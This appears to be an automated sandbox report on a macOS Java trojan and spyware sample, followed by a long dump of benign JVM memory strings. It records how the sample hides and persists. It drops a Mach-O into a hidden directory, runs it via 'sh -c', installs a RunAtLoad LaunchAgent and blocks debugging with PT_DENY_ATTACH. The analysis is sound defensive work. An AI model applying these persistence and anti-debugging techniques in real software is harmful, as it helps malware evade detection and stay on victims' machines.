Classification label: mal92.troj.spyw.evad.macJAR@0/9@24/0

Data Obfuscation:

Java spawns dropped Mach-O files

Show sources

Source: PID: 556

Dropped Mach-O executed via jspawnhelper: /Users/berri/kIbwf02l

Jump to behavior

Persistence and Installation Behavior:

Executes hidden files

Show sources

Source: /bin/sh (PID: 557)

File in hidden directory executed: /Users/berri/.gLUpQD8hXDj8/NBNlRBXH.app/Contents/MacOS/NBNlRBXH /Users/berri/.gLUpQD8hXDj8/NBNlRBXH.app/Contents/MacOS/NBNlRBXH

Jump to behavior

Writes Mach-O files to hidden directories

Show sources

Source: /Users/berri/kIbwf02l (PID: 556)

64-bit Mach-O written to hidden directory: /Users/berri/.gLUpQD8hXDj8/NBNlRBXH.app/Contents/MacOS/NBNlRBXH

Jump to dropped file

Source: /Library/Java/JavaVirtualMachines/jdk-11.0.2.jdk/Contents/Home/bin/java (PID: 555)

Permissions modified for written 64-bit Mach-O /Users/berri/kIbwf02l: bits: - usr: - grp: - all: rwx

Jump to dropped file

Source: /Users/berri/kIbwf02l (PID: 556)

Bundle Info.plist File created: /Users/berri/.gLUpQD8hXDj8/NBNlRBXH.app/Contents/Info.plist

Jump to behavior

Source: /Users/berri/kIbwf02l (PID: 556)

Hidden Directory created: /Users/berri/.gLUpQD8hXDj8 -> /Users/berri/.gLUpQD8hXDj8

Jump to behavior

Source: /Users/berri/kIbwf02l (PID: 556)

Shell command executed: sh -c /Users/berri/.gLUpQD8hXDj8/NBNlRBXH.app/Contents/MacOS/NBNlRBXH

Jump to behavior

Source: /System/Library/CoreServices/Jar Launcher.app/Contents/MacOS/Jar Launcher (PID: 554)	Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plist			Jump to behavior
Source: /Library/Java/JavaVirtualMachines/jdk-11.0.2.jdk/Contents/Home/bin/java (PID: 555)	Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plist			Jump to behavior

Source: /Library/Java/JavaVirtualMachines/jdk-11.0.2.jdk/Contents/Home/bin/java (PID: 555)	File written: /Users/berri/kIbwf02l			Jump to dropped file
Source: /Users/berri/kIbwf02l (PID: 556)	File written: /Users/berri/.gLUpQD8hXDj8/NBNlRBXH.app/Contents/MacOS/NBNlRBXH			Jump to dropped file

Source: /Applications/Preview.app/Contents/MacOS/Preview (PID: 558)

Random device file read: /dev/random

Jump to behavior

Source: /System/Library/CoreServices/Jar Launcher.app/Contents/MacOS/Jar Launcher (PID: 554)	AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist	Jump to behavior
Source: /Library/Java/JavaVirtualMachines/jdk-11.0.2.jdk/Contents/Home/bin/java (PID: 555)	AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist	Jump to behavior
Source: /Applications/Preview.app/Contents/MacOS/Preview (PID: 558)	AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist	Jump to behavior

Source: /System/Library/CoreServices/Jar Launcher.app/Contents/MacOS/Jar Launcher (PID: 555)	Java binary: /usr/bin/java			Jump to behavior
Source: /usr/bin/java (PID: 555)	Java binary: /Library/Java/JavaVirtualMachines/jdk-11.0.2.jdk/Contents/Home/bin/java			Jump to behavior

Source: /Users/berri/kIbwf02l (PID: 556)	XML plist file created: /Users/berri/.gLUpQD8hXDj8/NBNlRBXH.app/Contents/Info.plist			Jump to dropped file
Source: /Users/berri/kIbwf02l (PID: 556)	XML plist file created: /Users/berri/Library/LaunchAgents/com.gLUpQD8hXDj8.NBNlRBXH.plist			Jump to dropped file

Source: /Users/berri/kIbwf02l (PID: 556)

Launch agent/daemon created with KeepAlive and/or RunAtLoad, file created: /Users/berri/Library/LaunchAgents/com.gLUpQD8hXDj8.NBNlRBXH.plist

Jump to behavior

Source: /Users/berri/kIbwf02l (PID: 556)

Launch agent created File created: /Users/berri/Library/LaunchAgents/com.gLUpQD8hXDj8.NBNlRBXH.plist

Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Denies being traced/debugged (via ptrace PT_DENY_ATTACH)

Show sources

Source: /Users/berri/kIbwf02l (PID: 556)	PTRACE system call (PT_DENY_ATTACH): PID 556 denies future traces			Jump to behavior
Source: /Users/berri/.gLUpQD8hXDj8/NBNlRBXH.app/Contents/MacOS/NBNlRBXH (PID: 557)	PTRACE system call (PT_DENY_ATTACH): PID 557 denies future traces			Jump to behavior

Source: kIbwf02l.246.dr	Dropped file: section __text with 7.1309 entropy (max. 8.0)
Source: NBNlRBXH.248.dr	Dropped file: section __text with 7.1309 entropy (max. 8.0)

Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp	Binary or memory string: __ZN8JVMCIEnv18get_klass_by_indexERK18constantPoolHandleiRbP5Klass
Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmp	Binary or memory string: Unable to link/verify VirtualMachineError class
Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmp	Binary or memory string: /scratch/mesos/slaves/07fc96ef-bf4d-487f-b22f-a84e49f5f44a-S27799/frameworks/1735e8a2-a1db-478c-8104-60c8b0af87dd-0196/executors/23259148-f5c6-492a-83be-44c13ecc6561/runs/a079e66e-7a74-497b-8aee-a8f77a442865/workspace/open/src/hotspot/share/jvmci/jvmciCompilerToVM.cpp
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp	Binary or memory string: __ZN29HotSpotJVMCIMetaAccessContext15set_allContextsEP15objArrayOopDesc
Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmp	Binary or memory string: JVMCIRuntime::new_array
Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmp	Binary or memory string: (JVMCI)
Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmp	Binary or memory string: JVMCINMethodSizeLimit
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp	Binary or memory string: __ZN5ciEnv36_HotSpotJVMCIMetaAccessContext_klassE
Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmp	Binary or memory string: _aot_jvmci_runtime_test_deoptimize_call_int
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp	Binary or memory string: __ZN12JVMCIRuntime18identity_hash_codeEP10JavaThreadP7oopDesc
Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmp	Binary or memory string: /scratch/mesos/slaves/07fc96ef-bf4d-487f-b22f-a84e49f5f44a-S27799/frameworks/1735e8a2-a1db-478c-8104-60c8b0af87dd-0196/executors/23259148-f5c6-492a-83be-44c13ecc6561/runs/a079e66e-7a74-497b-8aee-a8f77a442865/workspace/open/src/hotspot/share/jvmci/jvmciCompiler.hpp
Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmp	Binary or memory string: _aot_jvmci_runtime_dynamic_new_array
Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmp	Binary or memory string: _aot_jvmci_runtime_new_array
Source: java, 00000555.00000246.9.00000001025db000.00000001025e3000.rw-.sdmp	Binary or memory string: 7sun.property.sun.boot.library.path/Library/Java/JavaVirtualMachines/jdk-11.0.2.jdk/Contents/Home/lib(
Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmp	Binary or memory string: INCLUDE_JVMCI
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp	Binary or memory string: _jvmciHotSpotVMIntConstants
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp	Binary or memory string: __ZN13JVMCICompiler14compile_methodEP5ciEnvP8ciMethodiP12DirectiveSet
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp	Binary or memory string: __ZN12JVMCIRuntime30initialize_HotSpotJVMCIRuntimeEP6Thread
Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmp	Binary or memory string: JVMCIRuntime::validate_object
Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmp	Binary or memory string: JVMCIRuntime::throw_klass_external_name_exception
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp	Binary or memory string: __ZN29HotSpotJVMCIMetaAccessContext17set_metadataRootsEP8_jobjectP15objArrayOopDesc
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp	Binary or memory string: _jvmciHotSpotVMStructs
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp	Binary or memory string: __ZN12JVMCIRuntime16initialize_JVMCIEP6Thread
Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmp	Binary or memory string: jdk/vm/ci/runtime/JVMCI
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp	Binary or memory string: __ZN12JVMCIRuntime11monitorexitEP10JavaThreadP7oopDescP9BasicLock
Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmp	Binary or memory string: _aot_jvmci_runtime_exception_handler_for_pc
Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmp	Binary or memory string: JVMCIRuntime::log_object
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp	Binary or memory string: __ZN13JVMCICompiler9_instanceE
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp	Binary or memory string: _JVMCICounterSize
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp	Binary or memory string: __Z24set_jvmci_specific_flagsv
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp	Binary or memory string: __ZN16JVMCIKlassHandleC2EP6ThreadP5Klass
Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmp	Binary or memory string: JVMCIEnv::dependencies_invalid
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp	Binary or memory string: __ZN22HotSpotCompiledNmethod8jvmciEnvEP8_jobject
Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmp	Binary or memory string: JVMCIRuntime::dynamic_new_instance
Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmp	Binary or memory string: _aot_jvmci_runtime_validate_object
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp	Binary or memory string: __ZN14JVMCIVMStructs19localHotSpotVMTypesE
Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmp	Binary or memory string: __ CodeHeapStateAnalytics: Function %s is not supported__ CodeHeapStateAnalytics lock wait took %10.3f seconds ___________ CodeCache lock wait took %10.3f seconds ___________ CodeCache lock hold took %10.3f seconds ___________ CodeHeapStateAnalytics total duration %10.3f seconds _________Compilation events%4d COMPILE PROFILING SKIPPED: %snmethod %d%s 0x%016lx code [0x%016lx, 0x%016lx]retry at different tier%4d COMPILE SKIPPED: %sklass id='%d' unloaded='1' flags='%d'method id='%d' holder='%d' return='%d' arguments='' bytes='%d' iicount='%d'type id='%d' name='%s'unknown id='%d'/scratch/mesos/slaves/07fc96ef-bf4d-487f-b22f-a84e49f5f44a-S27799/frameworks/1735e8a2-a1db-478c-8104-60c8b0af87dd-0196/executors/23259148-f5c6-492a-83be-44c13ecc6561/runs/a079e66e-7a74-497b-8aee-a8f77a442865/workspace/open/src/hotspot/share/compiler/compileLog.cppsymbol id='%d' name='<compilation_log thread='%lu'><fragment><![CDATA[]]><![CDATA[]]></fragment></compilation_log>inline_success reason='inline_fail reason='</>code_cache/scratch/mesos/slaves/07fc96ef-bf4d-487f-b22f-a84e49f5f44a-S27799/frameworks/1735e8a2-a1db-478c-8104-60c8b0af87dd-0196/executors/23259148-f5c6-492a-83be-44c13ecc6561/runs/a079e66e-7a74-497b-8aee-a8f77a442865/workspace/open/src/hotspot/share/compiler/compileTask.cppguarantee(_code_handle != NULL) failed%c%c%c%c%c - (method) @ %d (native) compile_id='%d' compile_kind='osr' osr_bci='%d' level='%d' blocking='1'task_queued comment='%s' hot_count='%d'taskunknownfailure reason='%s'task_done success='%d' nmsize='%d' count='%d' backedge_count='%d' inlined_bytes='%d' %c%c%c @ %d (not loaded)CompileTaskLockno_reasonbackedge_counttieredCTWreplaywhiteboxmust_be_compiled/scratch/mesos/slaves/07fc96ef-bf4d-487f-b22f-a84e49f5f44a-S27799/frameworks/1735e8a2-a1db-478c-8104-60c8b0af87dd-0196/executors/23259148-f5c6-492a-83be-44c13ecc6561/runs/a079e66e-7a74-497b-8aee-a8f77a442865/workspace/open/src/hotspot/share/code/compiledIC.cpp - metadata: - klass: /scratch/mesos/slaves/07fc96ef-bf4d-487f-b22f-a84e49f5f44a-S27799/frameworks/1735e8a2-a1db-478c-8104-60c8b0af87dd-0196/executors/23259148-f5c6-492a-83be-44c13ecc6561/runs/a079e66e-7a74-497b-8aee-a8f77a442865/workspace/open/src/hotspot/share/oops/compiledICHolder.cppguarantee(holder_metadata()->is_method() \|\| holder_metadata()->is_klass()) failedshould be method or klassguarantee(holder_klass()->is_klass()) failedshould be klass{compiledICHolder}/scratch/mesos/slaves/07fc96ef-bf4d-487f-b22f-a84e49f5f44a-S27799/frameworks/1735e8a2-a1db-478c-8104-60c8b0af87dd-0196/executors/23259148-f5c6-492a-83be-44c13ecc6561/runs/a079e66e-7a74-497b-8aee-a8f77a442865/workspace/open/src/hotspot/cpu/x86/compiledIC_aot_x86_64.cppguarantee(stub != NULL) failedstub not foundCompiledPltStaticCall/scratch/mesos/slaves/07fc96ef-bf4d-487f-b22f-a84e49f5f44a-S27799/frameworks/1735e8a2-a1db-478c-8104-60c8b0af87dd-0196/executors/23259148-f5c6-492a-83be-44c13ecc6561/runs/a079e66e-7a74-497b-8aee-a8f77a442865/workspace/o
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp	Binary or memory string: __ZN8JVMCIEnv15register_methodERK12methodHandleRP7nmethodiP11CodeOffsetsiP10CodeBufferiP9OopMapSetP21ExceptionHandlerTableP16AbstractCompilerP24DebugInformationRecorderP12DependenciesPS_ibb6HandleSL_SL_
Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmp	Binary or memory string: JVMCIHostThreads
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp	Binary or memory string: __ZN10JavaThread26_jvmci_old_thread_countersE
Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmp	Binary or memory string: JVMCIRuntime::none
Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmp	Binary or memory string: JVMCITrace-1:
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp	Binary or memory string: __ZN12JVMCIRuntime8shutdownEP6Thread
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp	Binary or memory string: __ZN13JVMCICompiler9bootstrapEP6Thread
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp	Binary or memory string: __ZN12JVMCIRuntime24load_and_clear_exceptionEP10JavaThread
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp	Binary or memory string: __ZN7nmethod26clear_jvmci_installed_codeEv
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp	Binary or memory string: __ZN12JVMCIRuntime24test_deoptimize_call_intEP10JavaThreadi
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp	Binary or memory string: __ZN12JVMCIRuntime10log_printfEP10JavaThreadPKclll
Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmp	Binary or memory string: JVMCIRuntime::new_instance
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp	Binary or memory string: __ZN22HotSpotCompiledNmethod16_jvmciEnv_offsetE
Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmp	Binary or memory string: guarantee(!_HotSpotJVMCIRuntime_initialized) failed
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp	Binary or memory string: __ZN14JVMCIVMStructs21localHotSpotVMStructsE
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp	Binary or memory string: __ZN12JVMCIRuntime13log_primitiveEP10JavaThreadtlh
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp	Binary or memory string: __ZN12JVMCIRuntime23adjust_comp_level_innerERK12methodHandleb9CompLevelP10JavaThread
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp	Binary or memory string: __ZN19HotSpotJVMCIRuntime26compilationLevelAdjustmentE6Handle
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp	Binary or memory string: _jvmciHotSpotVMAddresses
Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmp	Binary or memory string: JVMCIUseFastLocking
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp	Binary or memory string: __ZN12JVMCIRuntime23get_HotSpotJVMCIRuntimeEP6Thread
Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmp	Binary or memory string: cannot reinitialize HotSpotJVMCIRuntime
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp	Binary or memory string: __GLOBAL__sub_I_jvmciCodeInstaller.cpp
Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmp	Binary or memory string: EagerJVMCI
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp	Binary or memory string: __ZN12JVMCIGlobals24check_jvmci_supported_gcEv
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp	Binary or memory string: __ZN8JVMCIEnv23get_field_by_index_implEP13InstanceKlassR15fieldDescriptori
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp	Binary or memory string: __ZN19HotSpotJVMCIRuntime34_compilationLevelAdjustment_offsetE
Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmp	Binary or memory string: JVMCIRuntime::write_barrier_pre
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp	Binary or memory string: __ZN13CodeInstaller13map_jvmci_bciEi
Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmp	Binary or memory string: JVMCIEnv::dependencies_failed
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp	Binary or memory string: __ZN16JVMCIKlassHandleC1EP6ThreadP5Klass
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp	Binary or memory string: __ZN5ciEnv12_JVMCI_klassE
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp	Binary or memory string: __ZN8JVMCIEnv45get_instance_klass_for_declared_method_holderEP5Klass
Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmp	Binary or memory string: JVMCICountersExcludeCompiler
Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmp	Binary or memory string: JVMCIRuntime::test_deoptimize_call_int
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp	Binary or memory string: __ZN12JVMCIRuntime12monitorenterEP10JavaThreadP7oopDescP9BasicLock
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp	Binary or memory string: __ZN22HotSpotCompiledNmethod12set_jvmciEnvEP8_jobjectl
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp	Binary or memory string: __ZN13JVMCICompiler15supports_nativeEv
Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmp	Binary or memory string: _aot_jvmci_runtime_new_multi_array
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp	Binary or memory string: __ZN13JVMCICompiler4nameEv
Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmp	Binary or memory string: JVMCIRuntime::throw_and_post_jvmti_exception
Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmp	Binary or memory string: JVMCI Compiler does not support selected GC
Source: java, 00000555.00000246.9.00000001025db000.00000001025e3000.rw-.sdmp	Binary or memory string: ,java.property.java.home/Library/Java/JavaVirtualMachines/jdk-11.0.2.jdk/Contents/Home
Source: java, 00000555.00000246.9.00000001025db000.00000001025e3000.rw-.sdmp	Binary or memory string: /Library/Java/JavaVirtualMachines/jdk-11.0.2.jdk/Contents/Home/lib
Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmp	Binary or memory string: JVMCI
Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmp	Binary or memory string: forcing TieredStopAtLevel to full optimization because JVMCI is enabled
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp	Binary or memory string: __ZN12JVMCIRuntime10log_objectEP10JavaThreadP7oopDescbb
Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmp	Binary or memory string: _aot_jvmci_runtime_log_printf
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp	Binary or memory string: __ZN12JVMCIRuntime29_HotSpotJVMCIRuntime_instanceE
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp	Binary or memory string: _JVMCIPrintProperties
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp	Binary or memory string: __ZN13JVMCICompiler12supports_osrEv
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp	Binary or memory string: __ZN12JVMCIRuntime10vm_messageEhllll
Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmp	Binary or memory string: _aot_jvmci_runtime_thread_is_interrupted
Source: java, 00000555.00000246.9.00000001025db000.00000001025e3000.rw-.sdmp	Binary or memory string: /Library/Java/JavaVirtualMachines/jdk-11.0.2.jdk/Contents/Home
Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmp	Binary or memory string: JVMCICounterSize
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp	Binary or memory string: __ZN12JVMCIRuntime20dynamic_new_instanceEP10JavaThreadP7oopDesc
Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmp	Binary or memory string: _aot_jvmci_runtime_write_barrier_post
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp	Binary or memory string: __ZN12CompilerToVM14get_jvmci_typeER16JVMCIKlassHandleP6Thread
Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmp	Binary or memory string: _aot_jvmci_runtime_monitorenter
Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmp	Binary or memory string: guarantee(can_initialize_JVMCI()) failed
Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmp	Binary or memory string: _aot_jvmci_runtime_identity_hash_code
Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmp	Binary or memory string: /scratch/mesos/slaves/07fc96ef-bf4d-487f-b22f-a84e49f5f44a-S27799/frameworks/1735e8a2-a1db-478c-8104-60c8b0af87dd-0196/executors/23259148-f5c6-492a-83be-44c13ecc6561/runs/a079e66e-7a74-497b-8aee-a8f77a442865/workspace/open/src/hotspot/share/jvmci/jvmciRuntime.cpp
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp	Binary or memory string: __ZN14JVMCIVMStructs26localHotSpotVMIntConstantsE
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp	Binary or memory string: _JVM_GetJVMCIRuntime
Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmp	Binary or memory string: /scratch/mesos/slaves/07fc96ef-bf4d-487f-b22f-a84e49f5f44a-S27799/frameworks/1735e8a2-a1db-478c-8104-60c8b0af87dd-0196/executors/23259148-f5c6-492a-83be-44c13ecc6561/runs/a079e66e-7a74-497b-8aee-a8f77a442865/workspace/open/src/hotspot/share/jvmci/compilerRuntime.cpp
Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmp	Binary or memory string: JVMCIEnv::cache_full
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp	Binary or memory string: __ZN12JVMCIRuntime26throw_class_cast_exceptionEP10JavaThreadPKcP5KlassS5_
Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmp	Binary or memory string: VM is not yet sufficiently booted to initialize JVMCI
Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmp	Binary or memory string: JVMCI is producing code using vectors larger than the runtime supports
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp	Binary or memory string: __ZN8JVMCIEnv34validate_compile_task_dependenciesEP12Dependencies6HandlePS_PPc
Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmp	Binary or memory string: jvmci
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp	Binary or memory string: __ZN12JVMCIRuntime17adjust_comp_levelERK12methodHandleb9CompLevelP10JavaThread
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp	Binary or memory string: __ZN12CompilerToVM16get_jvmci_methodERK12methodHandleP6Thread
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp	Binary or memory string: _jvmciHotSpotVMTypes
Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmp	Binary or memory string: _aot_jvmci_runtime_new_instance
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp	Binary or memory string: __ZN12JVMCIRuntime12new_instanceEP10JavaThreadP5Klass
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp	Binary or memory string: _EnableJVMCI
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp	Binary or memory string: _JVMCITraceLevel
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp	Binary or memory string: __ZN13JVMCICompiler17_codeInstallTimerE
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp	Binary or memory string: __ZN13JVMCICompiler8instanceEbP6Thread
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp	Binary or memory string: __ZN5ciEnv26_HotSpotJVMCIRuntime_klassE
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp	Binary or memory string: __ZN8JVMCIEnvC2EP11CompileTaski
Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmp	Binary or memory string: ()Ljdk/vm/ci/runtime/JVMCIRuntime;
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp	Binary or memory string: __ZN14JVMCIVMStructs33localHotSpotVMLongConstants_countEv
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp	Binary or memory string: _JVMCIHostThreads
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp	Binary or memory string: __ZN29HotSpotJVMCIMetaAccessContext19_allContexts_offsetE
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp	Binary or memory string: __ZN13JVMCICompiler14compile_methodERK12methodHandleiP8JVMCIEnv
Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmp	Binary or memory string: _aot_jvmci_runtime_write_barrier_pre
Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmp	Binary or memory string: JVMCIRuntime::monitorexit
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp	Binary or memory string: __ZN14JVMCIVMStructs27localHotSpotVMLongConstantsE
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp	Binary or memory string: __ZN13CompileBroker25wait_for_jvmci_completionEP13JVMCICompilerP11CompileTaskP10JavaThread
Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmp	Binary or memory string: UseJVMCICompiler
Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmp	Binary or memory string: JVMCIRuntime::vm_message
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp	Binary or memory string: __ZN13CodeInstaller7installEP13JVMCICompiler6HandleS2_RP8CodeBlobS2_S2_P6Thread
Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmp	Binary or memory string: , jvmci compiler
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp	Binary or memory string: __ZN12JVMCIRuntime16object_notifyAllEP10JavaThreadP7oopDesc
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp	Binary or memory string: __ZN7nmethod25jvmci_installed_code_nameEPcm
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp	Binary or memory string: __ZN12JVMCIRuntime15kindToBasicTypeE6HandleP6Thread
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp	Binary or memory string: __ZN12JVMCIRuntime9new_arrayEP10JavaThreadP5Klassi
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp	Binary or memory string: _UseJVMCICompiler
Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmp	Binary or memory string: JVMCI Compiler CodeBuffer for Metadata
Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmp	Binary or memory string: The JVMCI compiler instance has not been created
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp	Binary or memory string: __ZN8JVMCIEnv25check_klass_accessibilityEP5KlassS1_
